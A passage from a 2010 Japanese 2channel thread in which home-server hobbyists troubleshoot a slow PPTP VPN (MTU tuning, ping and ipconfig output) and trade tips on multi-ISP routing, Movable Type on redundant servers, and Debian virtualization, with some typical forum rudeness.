/14かよ。すげーな。
918 :
DNS未登録さん :2010/09/11(土) 21:09:12 ID:pE/Nkdr6
質問です。 VPNに接続したら外部(Google)とかに接続ができないんですけどどーしてですか?
921 :
DNS未登録さん :2010/09/11(土) 22:11:11 ID:pE/Nkdr6
>>920 マシンってクライアント側?
てか接続はできるんだけどやたら速度が遅い。。。
上見たらMTUとか書いてあったけど、それはping打って最大の指定してます。
写真開くのも40秒かかるwww
ありえないしょ?
MTUブラックホール
923 :
DNS未登録さん :2010/09/11(土) 22:46:08 ID:pE/Nkdr6
924 :
DNS未登録さん :2010/09/11(土) 22:50:05 ID:pE/Nkdr6
名前の解決はスムースにできてんの?
VPNでも色々あるからねぇ。 PPTP辺りでそういうトラブルはよくあった。 厄介な事に接続元回線によってトラブルが起きたり、起きなかったり。 保護ルートのみ暗号化通信されるようなIPsec VPNだと そういうトラブルからは解消されるけど、 イーモバイルだとPPTPの時と違ってIPアドレスが変わらないから規制かかったりもするね。
927 :
DNS未登録さん :2010/09/11(土) 23:17:36 ID:pE/Nkdr6
>>925 名前解決は出来てると思う。
ちゃんとドメイン登録してるしね
928 :
DNS未登録さん :2010/09/11(土) 23:19:27 ID:pE/Nkdr6
>>926 あーPPTP使ってるわ。。。
IPsecの方がトラブるが少ないって認識でOK?
929 :
DNS未登録さん :2010/09/12(日) 07:44:18 ID:u5UbS4Y/
930 :
926 :2010/09/12(日) 20:17:51 ID:???
>>928 接続後の話ね。
NAT越えをする場合はルータがパススルーしてくれるかに依存なので。
PPTPやダイアルアップのL2TPは全経路がVPNを通るから
接続後にVPN環境以外のネット閲覧速度の低下など問題がおきやすい。
トラブルが一番少ないのはpacketixやut-vpnのSSL-VPNじゃないかな。
自分はiPadからも繋ぐからIPsec(ciscoルータ)を使ってるけど、
パフォーマンスや接続しやすさの両立ならSSL-VPNだと思う。
自分の主観だけど、拠点間接続じゃないリモートアクセスだと↓な感じかね。
【導入コスト(安<高)】 PPTP≦SSL-VPN<IPsec
【速度(遅<速)】 PPTP<IPsec<SSL-VPN
931 :
DNS未登録さん :2010/09/13(月) 00:54:48 ID:98E3AtU/
>>930 丁寧に解説してくれてありがとう。
実は俺もiPadから使いたいと思ってるんだ。ということはIPsecってことになるのかな。
PPTPで運用してて、接続先の資産を閲覧するのにもかなりストレスを感じるからもうそっちに変えます。
ちなみにうちのネットワークの構成だけど。。。。。。
(鯖)ー(ハブ)ー(NTTのあれ)ー(Internet)ー
|
(baffalo ルータ)ー(winPC)
ちなみにwinPCと鯖はsmbでファイル共有をしてます。
外部から共有ファイル覗くのに速度低下するのは、こんな複雑な構成してるといた仕方ないのかな?
鯖でOpenVPNとか回せばいいんじゃない?
OpenVPNだとiPad用の接続クライアントがないんじゃね?
934 :
931 :2010/09/13(月) 23:44:33 ID:O7R9VHGR
>>933 そうなんすよ・・・・
ちなみにうちのネットワーク構成の図がずれてたw
(鯖)ー(ハブ)ー(NTTのあれ)ー(Internet)ー
|
(baffalo ルータ)ー(winPC)×5台+iPad+iPhone
ってな感じでw
外からじゃ写真の表示すら遅くて遅くてPCぶっ壊そうかと思ったw
935 :
DNS未登録さん :2010/09/14(火) 19:15:54 ID:z6M6JD2q
(インターネット)−(NTTのあれ)−(ロードバランサ)−(Web鯖)−(CMS鯖)−(DB鯖) └(Web鯖)┘ うちの構成がこうで、 movabletypeを入れたいんですが、 どの鯖にインストールすればいいですか? あと設定もどうすべきかご教授頂けると幸いです
NTTのあれ。だな。
>>935 なんでこんな質問してくるのにそこまですごい構成のサーバー構築してんだよw
938 :
DNS未登録さん :2010/09/14(火) 21:23:51 ID:z6M6JD2q
>>937 すんません、MTは全然わからなくて・・・
ぐぐらせて頂いても冗長化構成の事例が見つからなくて困っております
ロードバランサーを入れてる意味がよくわからん。 ウェブ鯖がアクティブ/スタンバイ構成ならDRBD+heartbeatでフェイルオーバー、 ウェブ鯖がアクティブ/アクティブならNFSとかでファイル共有でもしとけば?
共通のDB鯖が別にあるんだから普通にWeb鯖でいいんじゃ? セッション維持の心配してるの?
941 :
DNS未登録さん :2010/09/15(水) 10:54:00 ID:CcqALEIs
>>939 >>940 アクティブ/アクティブっす。
lsync+rsyncでCMSからWebに配布しているので、
CMS鯖にMT入れたらWeb上でリンク切れるし(当然だが)
両方のWeb鯖に入れてどっちかからもう一方にコピるしかないかとか
両方にコメントされたらDBには両方のデータが入るけど、
再構築するまでは片方ずつにそれぞれのコメントが表示されてしまうのかとか
もうパニックです。
942 :
DNS未登録さん :2010/09/15(水) 23:12:32 ID:LnHQfvn9
派遣登録の時、Windows Server2003の資格を持ってるだけなのに、大体の事ならできますと言ってしまった。 ちなみにまだ一度も実機に触ったことないw そして明日から、サーバー管理のサブ管理者?として派遣されることになったw 何も起きないことだけを祈る。 やはり解説書も持って行ったほうが良いだろうか。。。 止めちゃったらどうしよう。。。
派遣には期待してないから大丈夫
>>942 イラスト描けると嘘ついてエロゲーメーカーに入っちゃった話がまとめサイトにあった。
YahooのBBフォンでダイアルアップサーバとか立てれますの?
あとはmgettyとか。 IP電話でダイアルアップ鯖出来るかは気になる。
948 :
945 :2010/09/16(木) 19:35:09 ID:???
実際PC→携帯→BBフォンでやってみたんだけどBBフォンが鳴らないんだよね もちろん携帯から直接ダイヤルすると鳴るんだ。 これってBB側の問題なのかしら?
949 :
DNS未登録さん :2010/09/17(金) 01:03:26 ID:u8jAd73d
PPTPで札幌ー東京間のネットワーク速度が500kbpsってどうよ
PCからATコマンドで携帯をダイアルしても鳴らないの?
951 :
945 :2010/09/17(金) 20:51:33 ID:???
携帯自体は発信してるんだけどBBフォンが応答しないんだ。 だから発信側のモデムの問題じゃないみたい。 NTT固定番号へ電話しても同じ現象だったんだけど、ダイアルアップ接続プロバイダに 電話したらちゃんと繋がってユーザとパスワード聞かれたから何がちがうんだろうなってところでお手上げ状態。
ソフトバンク以外で試してみよう
954 :
945 :2010/09/17(金) 23:16:27 ID:???
実際つないてるよぉ。 モデムは元々FAXサーバとして運用してる。 そしてモデムは電話機とブレンチしてるんで 普通なら着信するとまず電話機が発呼して 10コールでFAXが応答するしくみになってるから 着信すると電話が鳴るはずなんだよね。でも鳴らないんだよぉ。
だから禿携帯以外を使えっていってんだろ
禿じゃないと意味が無いのよ。ホワイトコール24を利用するから。 禿を使えという。そのこころは?
>>956 ツイッターで禿に呟いたら直してくれるかも知れんぞw
間違った。 禿以外を使えってどういうこと?
ウィルコム < 呼んだ?
>>959 関西テレメッセージのほうが幾分マシだ。
961 :
931 :2010/09/18(土) 15:23:04 ID:KJ5mBgDX
やっとこさ仕事休みになりました。 VPNの話ですが・・・・ WAN越えのクライアント側からサーバに ping を打ってみたんですが・・・ Reply from 192.168.1.2: bytes=32 time=355ms TTL=64 Reply from 192.168.1.2: bytes=32 time=290ms TTL=64 Reply from 192.168.1.2: bytes=32 time=89ms TTL=64 Reply from 192.168.1.2: bytes=32 time=142ms TTL=64 Ping statistics for 192.168.1.2: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 89ms, Maximum = 355ms, Average = 219ms って感じだった。 これってどうなんでしょう?
962 :
931 :2010/09/18(土) 15:26:28 ID:KJ5mBgDX
クライアントの ipconfig 情報です Ethernet adapter ローカル エリア接続: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.11.4 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.11.1 PPP adapter hogehoge: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.1.201 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 192.168.1.201
3連休裏山鹿。自分は今晩から明日昼までデータセンタに引きこもりだわ。 PPTPは随分前に辞めたから覚えてないが、そんなにレスポンス不安定だっけ? 普段はxconnect+ipsecでL2TPv3で繋いでる環境を 一旦切断してXPのノートPCからCisco VPN Clientで接続して 実家(ファミリー100)⇒自宅(光プレミアム)に置いてるNASにping結果。 Reply from 10.30.10.238: bytes=32 time=23ms TTL=127 Reply from 10.30.10.238: bytes=32 time=22ms TTL=127 Reply from 10.30.10.238: bytes=32 time=22ms TTL=127 Reply from 10.30.10.238: bytes=32 time=23ms TTL=127 Ethernet adapter ローカル エリア接続 4: Description . . . . . . . . . . . : Cisco Systems VPN Adapter IP Address. . . . . . . . . . . . : 10.30.200.20 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :
964 :
931 :2010/09/18(土) 17:11:46 ID:KJ5mBgDX
>>963 乙であります。データセンタは寒いよね。
PPTPがいけないのかな?
てか10分の1じゃない!レスポンスがw
何が原因かな?
Cisco専用ルータ使った方がいいのかな
>>964 今時のデータセンタは部屋全体を冷やさないから寒くないよ。
正面は床から風が出てくるから寒いけど、背面で作業する事が多いから暑い。
PPTPは自分もレスポンスに悩んだけどMTUが原因だったよ。
IPsecに乗り換えたのは暗号の強化と環境の変更が理由だけどね。
自分は仕事でCiscoやJuniper製品を使ってるから自宅でも勉強用に使ってるけど、
値段を考えるとコストパフォーマンスは宜しくないと思う。
VPNクライアントを入手するならSMARTnet加入も必須だし。
966 :
931 :2010/09/18(土) 18:15:10 ID:KJ5mBgDX
>>965 なるほど、ありがとう!
クライアント側のMTUを1372に変えてみたわ。
クライアントはALSLだから推奨値は1454らしいんだけど
ping 打って確かめてみたら
Packet needs to be fragmented but DF set
だってさw
>ping -f -l 1372 192.168.1.2の結果がこれ
Pinging 192.168.1.2 with 1372 bytes of data:
Reply from 192.168.1.2: bytes=1372 time=244ms TTL=64
Reply from 192.168.1.2: bytes=1372 time=286ms TTL=64
Reply from 192.168.1.2: bytes=1372 time=306ms TTL=64
Reply from 192.168.1.2: bytes=1372 time=311ms TTL=64
Ping statistics for 192.168.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 244ms, Maximum = 311ms, Average = 286ms
なんだかなぁw遅いねw
.
967 :
DNS未登録さん :2010/09/19(日) 00:50:20 ID:70e87R2i
自宅サーバー1台 フレッツ光ネクスト回線1本 で今使っているプロバイダ1社 これをもう1社追加して、自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、 出来ますでしょうか?
968 :
DNS未登録さん :2010/09/19(日) 01:35:26 ID:zTFqWq81
>>967 できるわけねーだろ、ボケ!
頭悪いんじゃね?
TCP/IPもう一度勉強しなおせ、クズ
>>967 可能。
ちなみに追加料金を少し払えば、最大5社追加できる。2社までは無料のはず。
970 :
967 :2010/09/19(日) 03:38:41 ID:???
>>969 セッション追加は既に回答がある通り可能。
同一OS上のファイルのアクセス回線を振り分けるのはかなり難儀だと思う。
そういう意味では
>>968 も間違いではない。
100%無理とは自分は断言できないけど、相当細工しないと無理そう。
972 :
DNS未登録さん :2010/09/19(日) 17:23:19 ID:p28+vtqP
仮想化すれば? 仮想OSいれてさー
974 :
DNS未登録さん :2010/09/19(日) 22:51:52 ID:p28+vtqP
半年ROMってます あとID隠すとか子どもだねビビり君 ここのスレの常連かしらないけどデカイ顔しないでほしい
けつ仮想化?
Debianに仮想化OSをインストールしたいんですが、 仮想化OSはどこに行けばダウンロード出来ますか?探しても見つかりませんでした。 プロ向けなので市販しかないのでしょうか。
>>976 は?なんだよ、その仮想化OSってよ?
バカか?お前が開発しろってアホ
VMwareでググれクズ
>>971 自分はApacheのVirtualHostディレクティブに*:80ではなく、IPアドレス明示で書いてやって、
あとはiptablesでできると思ったのだがそんなに難しいのか?
>>977 Debianに入れるって事だから、VMware Serverか、
Xen、KVMあたりになるだろうね。
CPUがVTに対応してないと使えないのもあるので要注意。
>>974 俺は
>>973 じゃないが、でかい顔とかじゃなくて知らないなら下手に答えなくていい
わざと混乱させたいのなら止めはしないが、真面目にやった結果ならかえって迷惑になる
あとID云々だが、一応ここでは質問はage(ここだとID出る)で、答えはsage(IDなし)でやってる人が多い
別に強制ではないが、そういう板の上の一スレ
>>978 フォルダって書いているからSambaでしょ?
Unix系とか書いてないからcifsでしょ
>>974 そのことについては謝る。 スマソ
sageすればいいってことか?
>>976 仮想環境用意してゲストOS動かしたい、という意味だとすると、
Oracle(旧Sun) VirtualBoxがお手軽。Debianパッケージで導入可能。
パフォーマンスも結構いいし、CPUが仮想化支援技術をサポートしてなくてもいい。
自分はDebian unstableのKVMでWindows XPとか動かしてます。
>>978 同一OSだとデフォルトルートが問題になるのでiptablesだけだと多分無理。
LinuxならそのApacheの設定+iproute2とか使うと何とかできそうな気はしますが、
>>967 の鯖のOSが何か不明なのでそれ以上は何とも。
>>984 フォローd。この設定は昔やったことあるので問題ないですが、
NATしてない事が前提なのでルータ2台必須になりますね。
自分はグローバルIPアドレス8個の回線×2で確認済みだけど質問主の環境が不明なのでなんとも。
デフォルトルートの件は、
入り口回線ごとに出口の負荷分散が必要であればiproute2必須ですね。
出口固定であれば無しでもいけますが、
USENだけL3がパケットのヘッダを見てて遮断するので若干ながらISP依存がありますが。
あとは昔linuxルータ1台で2つの回線に接続し、鯖はNATさせてた環境で、
鯖側はiproute2を使わずにいけたので、ルータによっては鯖のOS依存無しでいけるのかな?
今回の質問主の例だと鯖はApacheを2つ立てた上で、
ルータで接続元によってDNAT先のポートを変えてあげればよさげですね。
987 :
DNS未登録さん :2010/09/21(火) 01:23:51 ID:KWs59R/c
>>986 乙であります
VPNの話に戻ってしまって申し訳ないんだけども、MTUを変えたらpingの返しが平均40から50misに改善したんだけど、これってまだまだ遅い部類?
自分的にはまだもっさりするなぁって感じる
ちなみにまだ外部netにつなげ無い
ゲートウェイもしっかりチェック済みなんだが
>>987 >MTUを変えたらpingの返しが平均40から50misに改善したんだけど
それくらいじゃね
それでももっさりと思うなら別の手段を考えるしかないかと
>ちなみにまだ外部netにつなげ無い
NAT越えしつつ、拠点Aと拠点BのLANゾーンのアドレスが重複してたら起きる
IPsecでも起きる事なんだけど。
>>978 デフォルトゲートウエイが問題になるわけで。
iproute2 だと出来るのかな?
>>988 >
>>987 >>MTUを変えたらpingの返しが平均40から50misに改善したんだけど
>それくらいじゃね
>それでももっさりと思うなら別の手段を考えるしかないかと
>
了解です。ありがとう、安心した。
>>ちなみにまだ外部netにつなげ無い
>NAT越えしつつ、拠点Aと拠点BのLANゾーンのアドレスが重複してたら起きる
↑
この部分がよくわからないんだけど、拠点AをPPTP鯖(eth0: 192.168.1.2 ,
pptp:192.168.1.200)で拠点Bを遠地にあるクライアント(eth0:192.168.11.4, pptp mini-wan:192.168.1.201)
って構成なんだけど教えたくれた問題に該当する?
>>990 >この部分がよくわからないんだけど、拠点AをPPTP鯖(eth0: 192.168.1.2 ,
>pptp:192.168.1.200)で拠点Bを遠地にあるクライアント(eth0:192.168.11.4, pptp mini-wan:192.168.1.201)
>って構成なんだけど教えたくれた問題に該当する?
要するに接続元のネットワークが192.168.1.0/24、
接続先のネットワークに192.168.1.0/24が含まれてると発生するってこと。
その環境だと問題なさげだから設定とかの問題じゃないかね。
993 :
DNS未登録さん :2010/09/21(火) 20:30:28 ID:Z5+S/wXy
>>992 なるほど。。。ありがとうございます。
ちなみに設定の問題だとして、どこに不具合ありそうかエスパーできますか?
鯖がdebian, クライアントがXPっす
994 :
993 :2010/09/21(火) 21:57:41 ID:KWs59R/c
今家路につきました・・・・ 色々と問題の切り分けをしてみたんですが、以下の事が判明しました。 特定のサイトにのみつなげることが出来ないという現象が起きています。 Amazonとかは閲覧できてもYahooは見れないなど・・・ ググッテは見たもののルータの故障やらISPに問い合わせろなど これといった解決法が見当たらない状況です。 これってまだMTUが原因だったりしますかね?
>>994 Windows UpdateがダメならMTUブラックホール。
996 :
DNS未登録さん :2010/09/22(水) 11:26:09 ID:Zoyk6Jth
ラスト5
ラスト4
フライング1000
↓
ちょっと待ったぁ!
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。